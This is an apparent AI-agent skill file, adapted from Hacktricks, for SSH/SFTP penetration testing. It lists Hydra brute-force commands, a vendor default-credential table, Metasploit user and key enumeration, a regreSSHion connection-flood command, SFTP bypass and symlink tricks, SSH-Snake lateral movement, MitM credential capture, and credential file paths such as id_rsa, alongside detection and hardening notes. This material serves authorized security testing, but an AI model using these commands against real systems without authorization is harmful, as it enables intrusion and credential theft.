Hacktricks-skills ssh-pentesting
SSH/SFTP penetration testing and security assessment. Use this skill whenever the user needs to enumerate SSH services, test for vulnerabilities, check for weak configurations, attempt credential attacks, or assess SSH server security. Trigger on mentions of SSH, port 22, SFTP, remote access, SSH brute force, SSH enumeration, SSH vulnerabilities, or any SSH-related security testing tasks.
git clone https://github.com/abelrguezr/hacktricks-skills
skills/network-services-pentesting/pentesting-ssh/SKILL.MDSSH/SFTP Penetration Testing
A comprehensive skill for SSH security assessment, enumeration, and vulnerability testing.
Quick Start
# Basic enumeration ./scripts/ssh-enumerate.sh <target-ip> # Full audit with ssh-audit ./scripts/ssh-audit-wrapper.sh <target-ip> # Check for default credentials ./scripts/check-default-creds.sh <target-ip> # Scan for known vulnerabilities ./scripts/ssh-vuln-check.sh <target-ip>
Enumeration
Banner Grabbing
Get initial information about the SSH server:
nc -vn <IP> 22
Automated Enumeration
Use the bundled enumeration script:
./scripts/ssh-enumerate.sh <target-ip>
This runs:
- Banner grabbing
- Nmap default scripts
- Version detection
- Supported algorithms enumeration
- Host key retrieval
- Authentication methods check
SSH Audit
For comprehensive configuration auditing:
./scripts/ssh-audit-wrapper.sh <target-ip>
This uses ssh-audit to:
- Analyze SSH client/server configuration
- Detect weak/legacy algorithms
- Identify CVEs and security issues
- Provide hardening recommendations
Nmap Scripts
# Default scripts nmap -p22 <ip> -sC # Version detection nmap -p22 <ip> -sV # Supported algorithms nmap -p22 <ip> --script ssh2-enum-algos # Host keys (check for weak keys) nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full # Authentication methods nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root"
Public Key Retrieval
ssh-keyscan -t rsa <IP> -p <PORT>
Credential Testing
Default Credentials
Check against known default credentials:
./scripts/check-default-creds.sh <target-ip>
Common default credentials by vendor:
| Vendor | Usernames | Passwords |
|---|---|---|
| APC | apc, device | apc |
| Cisco | admin, cisco, root | cisco, Cisco, admin, password |
| Citrix | root, nsroot, admin | C1trix321, nsroot, rootadmin |
| Dell | root, admin, user1 | calvin, 123456, password |
| HP/3Com | admin, root, vcx | admin, password, hpinvent |
| Huawei | admin, root | 123456, admin, Admin123 |
| Juniper | netscreen | netscreen |
| NetApp | admin | netapp123 |
| Oracle | root, oracle, ilom-admin | changeme, ilom-admin, oracle |
| VMware | vi-admin, root, vmware | vmware, vmw@re, default |
Brute Force
Hydra (requires username):
hydra -v -V -l <username> -P <password-list> -t 1 <IP> ssh
Common password lists:
- https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt
- https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt
Username Enumeration
Some OpenSSH versions are vulnerable to timing attacks:
# Metasploit module msf> use scanner/ssh/ssh_enumusers
Private Key Testing
Test known private keys:
# Nmap script nmap --script ssh-publickey-acceptance <ip> # Metasploit msf> use scanner/ssh/ssh_identify_pubkeys # Python tool (supports legacy algorithms) ssh-keybrute.py <target> <key-file>
Known bad keys: https://github.com/rapid7/ssh-badkeys/tree/master/authorized
Weak SSH Keys (Debian PRNG)
Check for Debian predictable PRNG weak keys:
# Download and test against known weak keys git clone https://github.com/g0tmi1k/debian-ssh cd debian-ssh ./test.sh <target-ip>
Vulnerability Assessment
Known Vulnerabilities
Check for recent critical vulnerabilities:
./scripts/ssh-vuln-check.sh <target-ip>
This checks for:
- CVE-2024-6387 (regreSSHion) - OpenSSH 8.5p1–9.7p1 signal-handler race
- CVE-2024-3094 (xz backdoor) - XZ Utils 5.6.0/5.6.1 supply-chain attack
- CVE-2025-32433 - Erlang/OTP authentication bypass
- CVE-2018-10933 - libssh unauthenticated success
CVE-2024-6387 (regreSSHion)
Affects OpenSSH 8.5p1–9.7p1. Unauthenticated attackers can corrupt glibc heap.
Detection:
ssh -V <target> ssh -G <target> | grep ^userauths
Lab testing:
parallel -j200 "timeout 3 ssh -o PreferredAuthentications=none -o ConnectTimeout=2 attacker@${TARGET}" ::: {1..4000}
CVE-2024-3094 (xz Backdoor)
XZ Utils 5.6.0/5.6.1 contain trojanized code accepting attacker-signed packets.
Detection:
xz --version rpm -qi xz # or dpkg -l xz-utils ldd /usr/sbin/sshd | grep -E "systemd|lzma"
Erlang/OTP Authentication Bypass (CVE-2025-32433)
Affects OTP < 27.3.3, 26.2.5.11, 25.3.2.20. Allows unauthenticated RCE.
Detection: Look for message codes ≥ 80 before authentication.
Mitigation: Upgrade to 27.3.3 / 26.2.5.11 / 25.3.2.20 or newer.
Configuration Assessment
Root Login
Check if root login is permitted (security risk):
# In sshd_config, should be: PermitRootLogin no
Authentication Methods
Check for weak authentication methods:
ssh -v <target> # Look for: Authentications that can continue: publickey,password,keyboard-interactive
Force password authentication if needed:
ssh -v <target> -o PreferredAuthentications=password
SFTP Security
Command Execution Bypass:
Users with SFTP-only access may still execute commands:
ssh user@target /bin/bash
Secure SFTP Configuration:
Match User sftpuser ChrootDirectory %h ForceCommand internal-sftp AllowTcpForwarding no PermitTunnel no X11Forwarding no PermitTTY no
SFTP Symlink Attack:
If you have write access in SFTP, create symlinks to access other files:
sftp> symlink / froot
Then access via web or other services.
SFTP Tunneling:
sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip>
Lateral Movement
SSH-Snake
Automated lateral movement using discovered SSH keys:
git clone https://github.com/MegaManSec/SSH-Snake cd SSH-Snake python3 ssh_snake.py <target>
SSH-Snake:
- Finds SSH private keys on current system
- Identifies hosts where keys may work
- Attempts SSH connections
- Recursively repeats on new systems
Kerberos/GSSAPI Authentication
If target supports GSSAPI (e.g., Windows OpenSSH on domain):
# Sync time with KDC sudo ntpdate <dc.fqdn> # Generate krb5.conf netexec smb <dc.fqdn> -u <user> -p '<pass>' -k --generate-krb5-file krb5.conf sudo cp krb5.conf /etc/krb5.conf # Get TGT kinit <user> klist # SSH with GSSAPI ssh -o GSSAPIAuthentication=yes <user>@<host.fqdn>
Or use crackmapexec:
crackmapexec ssh --kerberos <target>
SSH MitM
Capture credentials via man-in-the-middle:
git clone https://github.com/jtesta/ssh-mitm cd ssh-mitm python3 ssh-mitm.py
Combine with ARP/DNS spoofing for traffic redirection.
Fuzzing
- https://packetstormsecurity.com/files/download/71252/sshfuzz.txt
- Metasploit:
auxiliary/fuzzers/ssh/ssh_version_2
Configuration Files to Check
/etc/ssh/ssh_config /etc/ssh/sshd_config ~/.ssh/authorized_keys ~/.ssh/ssh_known_hosts ~/.ssh/known_hosts ~/.ssh/id_rsa